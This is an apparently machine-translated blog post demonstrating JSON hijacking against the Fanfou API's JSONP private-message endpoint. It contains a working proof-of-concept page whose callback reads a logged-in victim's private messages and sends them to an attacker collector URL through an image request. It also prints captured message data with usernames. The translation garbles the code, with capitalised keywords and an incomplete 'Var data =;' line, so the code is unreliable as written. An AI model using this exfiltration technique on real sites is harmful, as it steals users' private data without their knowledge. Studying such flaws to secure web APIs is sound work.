Use of JSON Hijacking and Web API Security

By: cosine

What is the role of JSON Hijacking? As black brother said, you can use CSRF to obtain user privacy data :).
Finally, let's take a look at an attack example. Let's take a test. First let's look at this: <a href = "http://help.fanfou.com/api.html" target = "_ blank"> http://help.fanfou.com/api.html </a>. Meal APIs. Where:
Display private messages received by the user
<B> path: </B> http://api.fanfou.com/private_messages/inbox.20.json | xml]
<B> parameter: </B>
[(Optional)-number of private messages, ranging from 1 to 20. The default value is 20.
Example: http://api.fanfou.com/private_messages/inbox.xml? Count = 10
(Optional)-JavaScript function name, which is available in JSON format. JSON objects are called directly as parameters.
Example: http://api.fanfou.com/private_messages/inbox.xml? Callback = getStatuses
We use the returned data in JSON format, and the callback function can be customized. Then we can customize an edevil page:
<Script>
Function getStatuses (o ){
Var I = 0;
Var data =;
For (I; I <3; I ++ ){
// Alert (o [I]. text );
Data + = o [I]. sender_id
}
Alert (data );
New Image (). src = "http: // 127.0.0.1/JSONHiJack. asp? Hi = "+ escape (data );
}
</Script>
<Script src = http://api.fanfou.com/private_messages/inbox.json? Callback = getStatuses & count = 3> </script>

When a user logging on to this edevil page, his private message privacy will be exposed. The script in the first <script> label is our custom HiJacking function, and the second <script> label loads remote JS. The data is as follows:

GetStatuses ([{"id": 585904, "text": "Why didn't I say anything recently? "," Sender_id ":" Salina_Wu "," recipient_id ":" ycosxhack "," created_at ":" Sat May 31 05:00:01 + 0000 2008 "," sender_screen_name ":" LOLO ", "recipient_screen_name": "cosine"}, {"id": 444619, "text ":";! -- "<XSS >=& {()}", "sender_id": "xssis", "recipient_id": "ycosxhack", "created_at ": "Fri Apr 11 16:07:19 + 0000 2008", "sender_screen_name": "xssis", "recipient_screen_name": "cosine" },{ "id": 351757, "text ": "Ga ~ Add your friends ~ "," Sender_id ":" Salina_Wu "," recipient_id ":" ycosxhack "," created_at ":" Sat Mar 01 03:27:22 + 0000 2008 "," sender_screen_name ":" LOLO ", "recipient_screen_name": "cosine"}])

As the getStatuses function is defined by our prehijacking, the remote JS file in the second <script> tag executes the getStatuses function. The parameter is the JSON data above.

This is a CSRF process. However, the security threats caused by APIs are not just the use of JSON Hijacking. Read its API documentation carefully. See if there are other available places? For example:

Haha, this API is really a good thing. Not only is there a problem, but other open API services also have such threats. I will not continue to dig deep.